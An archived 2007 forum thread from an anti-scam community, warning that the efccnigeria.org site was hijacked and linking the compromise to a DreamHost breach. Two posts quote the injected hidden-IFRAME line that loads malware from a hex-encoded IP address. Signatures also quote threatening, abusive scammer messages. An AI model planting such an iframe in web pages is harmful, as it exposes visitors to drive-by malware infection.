SmartFeedSmartFeed          

WELCOME - YOU ARE CURRENTLY VIEWING 419EATER AS A GUEST

By joining our community you will have the ability to post topics and access other forums reserved for members. Registration is quick, simple and absolutely free. Join our community today by clicking here.

ScamWarners.com - Internet Anti-Fraud Center - now open!

These forums are READ ONLY. Click here to register on our new forums - aff.419eater.com

efccNigeria.org has been hijacked

View next topic
View previous topic

This forum is locked: you cannot post, reply to, or edit topics.This topic is locked: you cannot edit posts or make replies.
lotta
Baiting Guru

PostPosted: Wed Jun 13, 2007 7:53 pm Reply with quoteBack to top

The efccnigeria.org website has been hijacked and attempts to put nasties on your computer. If you are not using Firefox, do not visit the site.

Nigeria bank kills South Africa Netherlands Netherlands United Kingdom United Kingdom United Kingdom United Kingdom Spain Spain Spain United Arab Emirates
star star
Mortar Nurse Nastys Audi TT Mc Fry

Alan James Watson (AKA Bi Gal, AKA Big Al, AKA De Master Yoda) -2007, 2008, 2009, 2010 "Doos of the year" award winner

Frederick Fokker:
"I am giving you about a month to get your act together, i am cutting you and the eater a bit of slack"
Dec 11, 2007

Elton Purple Flower Black Ribbon Flying Monkey
Scam Patroller
Baiting Guru

PostPosted: Wed Jun 13, 2007 8:48 pm Reply with quoteBack to top

Since when has that happened, Lotta, I was on the EFCC site yesterday using the Opera browser.

Could one of our nice users who are using Linux take a look and see what's happening, please, cheers.

40x Nigeria 4x South Africa 2x Ghana 2x Benin 10x Ivory Coast 34x United Kingdom 17x United States 9x Spain 1x Belgium 1x 6x European Union 4x Canada 1x New Zealand 6x Netherlands 1x pyramid 23x Cellphone Jolly Roger
Vcamera YMCA Vcamera Summer Holdiay + Bus Hijack

www.scamwarners.com - www.scam-info-links.info - www.aa419.org - The Numpties Gallery
shuntbuzz
Illeterate pinhead

PostPosted: Wed Jun 13, 2007 8:56 pm Reply with quoteBack to top

Erm - I thought FF was better than IE at handling suspect sites - is this an FF specific attack?

Mortar x7
jose_cuervo
Baiting Guru

Location: Packing Vaseline in my frilly boots, I can’t help if it gets in other places.

PostPosted: Wed Jun 13, 2007 9:13 pm Reply with quoteBack to top

/\/\/\
lotta wrote:
If you are not using Firefox, do not visit the site.

Wink

“I guess a man is the only kind of varmint sets his own trap, baits it, and then steps in it.” ~ John Steinbeck
music man
Baiting Guru

PostPosted: Wed Jun 13, 2007 9:21 pm Reply with quoteBack to top

Using Ubuntu 7.04 and FF 2.0.03 - site seems fine.

Switzerland x2 Netherlands x2 Filipino flag United States x104 United Kingdom x213 Portugal x4 Spain x20 Belgium x4 Canada Hong Kong Italy x2 x1 France x2 Russia x2 Luxembourg Australia x2 Sweden x2 Czech Republic x2 Mortar x13

You will rot in jail.watch your back- any shadow could be mine ! YOU ARE VERY EASY TO TRACK IN YOU NEIGHBOURHOOD ! DRUNKARD AND A SCUMBAG LIKE YOU!
mike lawrence (cheque scammer)

Go fuck your dead parents asshole!!!How can a deaf fool make clean money..The money that you have will never be spent on anything reasonable.
So fuck off..dont reply me again until the cops get your stinking ass...
Lyord Melson- cheque scammer
$4.002million and £214K in fake cheques taken out of circulation. (updated May 2009)
shuntbuzz
Illeterate pinhead

PostPosted: Wed Jun 13, 2007 9:31 pm Reply with quoteBack to top

~jose_cuervo,

Embarassed Embarassed Embarassed To many glasses of vino rougo ordinaire tonight methinks Embarassed Embarassed Embarassed

Mortar x7
kleindoofy
*** BANNED ***

PostPosted: Wed Jun 13, 2007 9:34 pm Reply with quoteBack to top

^^^^^^

http://forum.419eater.com/forum/viewtopic.php?p=915889#915889

Laughing Laughing
lotta
Baiting Guru

PostPosted: Wed Jun 13, 2007 11:39 pm Reply with quoteBack to top

@SP I don't know when this happened as I'm getting the info from someone else.

Apparently the offending code is at the bottom of the page.
Quote:

<!-- 1181707329 --><IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>
</IFRAME>

This directs to a malicious site in a hidden frame and appears to only affect IE users

Nigeria bank kills South Africa Netherlands Netherlands United Kingdom United Kingdom United Kingdom United Kingdom Spain Spain Spain United Arab Emirates
star star
Mortar Nurse Nastys Audi TT Mc Fry

Alan James Watson (AKA Bi Gal, AKA Big Al, AKA De Master Yoda) -2007, 2008, 2009, 2010 "Doos of the year" award winner

Frederick Fokker:
"I am giving you about a month to get your act together, i am cutting you and the eater a bit of slack"
Dec 11, 2007

Elton Purple Flower Black Ribbon Flying Monkey
Scam Patroller
Baiting Guru

PostPosted: Wed Jun 13, 2007 11:40 pm Reply with quoteBack to top

Cheers, Lotta, plenty of info about that url on Google:

http://www.google.com/search?hl=en&client=opera&rls=en&hs=yCc&q=0xcb.0xdf.0x9e.0x0c%2Ft&btnG=Search

Quote:
I suffered form 2 different changes. 1.- The spam links 2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a Black screen after you open the page with IE6 and thats it. The code inserted in my index.html and index.php files was this one: <code>IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'> So this action is not for PR, is just evil

Also a story about it on TheRegister:

http://www.theregister.co.uk/2007/06/07/dreamhost_hack/

Quote:
Hackers load malware onto Mercury music award site Security nightmare for DreamHost.

Hackers have been able to load malware onto the official Mercury music awards site, as well as hundreds of other sites, after breaking into the systems of US-based hosting firm DreamHost.

DreamHost blamed a security flaw in its web control panel software for an attack that allowed hackers to compromise a "very small subset" of user accounts. Affected customers have been notified by email. DreamHost said only web content - not credit card or billing information - was compromised.

In a statement published Wednesday, DreamHost said: "The security flaw allowed the attackers to log into our customer web control panel with the access privileges of another user. From our web panel they were able to access individual user password information. The attackers also attempted to gain access to our central database and billing information but were ultimately thwarted in that attempt. No credit card information or customer personal information was obtained."

DreamHost takes care of more than 500,000 domains, according to the firm. An email sent by DreamHost to its customers on 5 June, said approximately 3,500 separate FTP accounts were compromised by the hack. DreamHost has advised its customers to change their FTP account passwords immediately. The firm has promised to update concerned punters about the steps it is taking to prevent a repetition.

News of the attack followed just hours after DreamHost said it had upgraded its WebFTP systems. The timing of this announcement suggests this was more likely to have been part of DreamHost's efforts to put its house in order rather than the cause of its problems.

UK-based web security firm ScanSafe, which has been monitoring the attack, said attackers used the insecure web controls at DreamHost to load Trojan downloader malware onto well known and trused sites. Confirmed targets of the attack include nationwidemercurys.com, the Mercury music awards site (which is sponsored by building society Nationwide), and UK law firm Clintons, whose clients include Paul McCartney, The Who, and U2.

ScanSafe said it first detected malware on the Clintons site on 1 June and on the Mercury site on 4 June, a few days before DreamHost published its alert.

Both the Clintons and Mercury sites exposed visitors via unknowingly hostile exploit code that attempted to take advantage of the well-known iFrame vulnerability in Internet Explorer in attempts to download Trojan horse malware onto the PCs of visiting surfers running vulnerable versions of Windows.

ScanSafe contacted both organisations to notify them of the threat. �

Efccnigeria.org is of course hosted by, DreamHost.

40x Nigeria 4x South Africa 2x Ghana 2x Benin 10x Ivory Coast 34x United Kingdom 17x United States 9x Spain 1x Belgium 1x 6x European Union 4x Canada 1x New Zealand 6x Netherlands 1x pyramid 23x Cellphone Jolly Roger
Vcamera YMCA Vcamera Summer Holdiay + Bus Hijack

www.scamwarners.com - www.scam-info-links.info - www.aa419.org - The Numpties Gallery
This forum is locked: you cannot post, reply to, or edit topics.This topic is locked: you cannot edit posts or make replies.

Jump to:   

View next topic
View previous topic